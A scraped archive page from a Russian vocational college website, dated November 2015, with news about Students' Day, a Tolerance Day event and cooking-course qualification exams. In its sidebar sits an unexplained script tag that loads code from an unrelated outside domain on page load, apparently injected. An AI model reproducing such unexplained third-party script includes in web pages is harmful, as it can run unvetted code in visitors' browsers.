Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 225

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

  
Главная » 2015 » Ноябрь » 20

 

       17 ноября  обучающиеся колледжа отмечали  Международный День студентов. Члены Совета обучающихся выступили перед ребятами с поздравлениями и пожеланиями творческих и спортивных успехов. 

... Читать дальше »

Просмотров: 656 | Добавил: iTiger | Дата: 20.11.2015 | Комментарии (0)

Если каждый друг к другу будет терпим,

То вместе мы сделаем толерантным наш мир.

 

В целях формирования толерантного сознания и культуры обучающихся в условиях поликультурной и полиэтнической среды, а так же в целях воспитания у обучающихся стремления противостоять насилию и жестокости в современном мире, формирование у обучающихся опыта межкультурного взаимодействия,  толерантного поведения, в колледже прошло мероприятие, посвященное  международному Дню толерантности «Национальное изобилие». Обучающихся познакомили с историей Дня толерантности.  «Каждый из нас должен стремиться поддерживать принципы терпимости, взаимного уважения и мирного сосуществования»,- говорит председатель Совета обучающихся Виталий Чубыкин. 

... Читать дальше »

Просмотров: 573 | Добавил: iTiger | Дата: 20.11.2015 | Комментарии (0)

Последний курс - он трудный самый. Позади квалификационные экзамены.  В группе ПО-011/11т. (з) по специальности Профессиональное обучение (по отраслям). Технология продукции общественного питания заочной формы обучения на занятиях всегда царит доброжелательная атмосфера, а на защите проектов по профессии  «повар» или «кондитер» обязательно появляется какой-нибудь бренд. На этот раз в коллективе родилась идея поэкспериментировать. Студентки разделились на три группы и  в соавторстве разработали свои рецепты. Результаты итоговой защиты удивили экзаменационную комиссию.

    Первый проект – приготовление бисквитного торта повышенной сложности - назывался «Кокосовый рай». В технологическую карту  студентки (Дьякова Л.А., Пинигина В.А., Пономарёва О.А.) внесли  переработанную  информацию нескольких базовых рецептов приготовления ... Читать дальше »

Просмотров: 1471 | Добавил: iTiger | Дата: 20.11.2015 | Комментарии (1)

Квалификационный экзамен по профессии «повар» прошёл на высоком уровне совместного творчества студентов и Федосенко Ирины Петровны, мастера производственного обучения  высшей категории.

21 век – век гастрономических «технологий». В день экзамена  комиссии было предоставлено меню квалификационных проектов, а именно, блюд повышенной сложности:

 

 холодные закуски:

- щука фаршированная                

 

горячие блюда:

 - зразы рыбные «Донские»

 - котлета отбивная на косточке

... Читать дальше »

Просмотров: 870 | Добавил: iTiger | Дата: 20.11.2015 | Комментарии (0)



Вход на сайт

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Ноябрь 2015  »
ПнВтСрЧтПтСбВс
      1
2345678
9101112131415
16171819202122
23242526272829
30

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2024
Создать бесплатный сайт с uCoz